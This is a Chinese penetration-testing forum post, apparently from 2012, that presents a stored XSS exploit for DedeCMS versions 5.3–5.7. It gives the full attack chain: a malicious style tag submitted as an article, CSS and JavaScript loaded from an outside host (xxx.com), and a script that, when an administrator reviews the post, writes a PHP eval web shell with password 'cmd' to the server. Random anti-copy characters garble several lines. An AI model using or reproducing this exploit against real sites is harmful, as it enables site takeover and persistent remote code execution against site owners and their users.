找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1792|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell" _% W% _0 y( C% w1 y
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
4 ?1 p& E+ J* ?$ o; P& W9 u, O目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
8 l4 b. c! {, r* o/ o# @/ x6 Y下面说说利用方法。4 D/ [: X# [7 `, s9 Y
条件有2个:
) |9 }1 `# `4 P5 O7 R2 ?1.开启注册
% M: V5 @0 Q- L( a. g2.开启投稿
5 q1 A. M# `# {注册会员----发表文章
, W! [" p* C6 A( h6 h3 m内容填写:$ N! b! w/ p, ~/ [
复制代码* o6 T5 ?! a6 a+ ?
<style>@im\port'\http://xxx.com/xss.css';</style>& |2 k! Y3 d$ T
新建XSS.Css
1 U4 ?. W. {' B复制代码" _: M  X5 G4 }$ H. O; K. J
.body{: u! B; R9 z( {
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }3 N- p7 `0 n  v$ |9 u4 L3 v
新建xss.js 内容为$ ]4 V8 W* ~4 M
复制代码( H" Y; }+ w3 `0 f7 K8 m5 h  x
1.var request = false;1 |- q' a/ f3 @0 \; Z9 S6 B. P( j
2.if(window.XMLHttpRequest) {
. q- `$ ~- u: s5 B% L8 K  |! g3.request = new XMLHttpRequest();
; S. W3 P' ^3 L7 H- y5 J) S; Q4.if(request.overrideMimeType) {
5 e% K* w% z! K9 ]5.request.overrideMimeType('text/xml');1 r, l. O9 |8 h' w
6.}
( e5 y" A+ R$ K$ O$ @( X8 H7.} else if(window.ActiveXObject) {0 H3 b9 J- z0 J
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
" W# i9 D) Q5 t# h$ _( w, h$ K2 p! I9.for(var i=0; i<versions.length; i++) {( q6 b! [; S" ?
10.try {
0 a9 }1 `" E2 _- x! Z11.request = new ActiveXObject(versions);, T( s; Y8 O) s
12.} catch(e) {}  ?) f+ i7 w) \% v1 l8 Z
13.}
7 X! D7 D7 N1 W: G14.}
6 l+ z2 W  y! ~8 a- F$ H15.xmlhttp=request;
3 _+ [2 B! k5 E  ^8 y16.function getFolder( url ){
7 [" Z1 P. E4 f, m+ t7 ?! E17. obj = url.split('/')7 k7 q- z% P+ \, p  F) S; \
18. return obj[obj.length-2]
* p; V9 F- @2 G! L, N' e8 A& P4 }0 B19.}
9 ]& r9 z4 g, y' y5 v" N& N/ t20.oUrl = top.location.href;
# x" r/ ?% o6 D7 [4 D21.u = getFolder(oUrl);& }! Y# U. T$ w
22.add_admin();+ e4 G  r- V/ H3 q3 @( t
23.function add_admin(){0 Z% @' ~' `6 K8 Z: s; I
24.var url= "/"+u+"/sys_sql_query.php";6 K  g& E1 @# b  x5 r* B" M
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";' h! x- n( s8 _( m9 }- J4 w! y2 t
26.xmlhttp.open("POST", url, true);2 T1 U! q& `# N3 b$ y
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");' B" e" n8 w' |; `
28.xmlhttp.setRequestHeader("Content-length", params.length);
$ ~. d! l8 B" j, n" I29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");  T. j2 k8 L  q$ w
30.xmlhttp.send(params);% w0 N! m" Y5 |' q( `; t
31.}8 A' Z) N# X8 @$ e
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表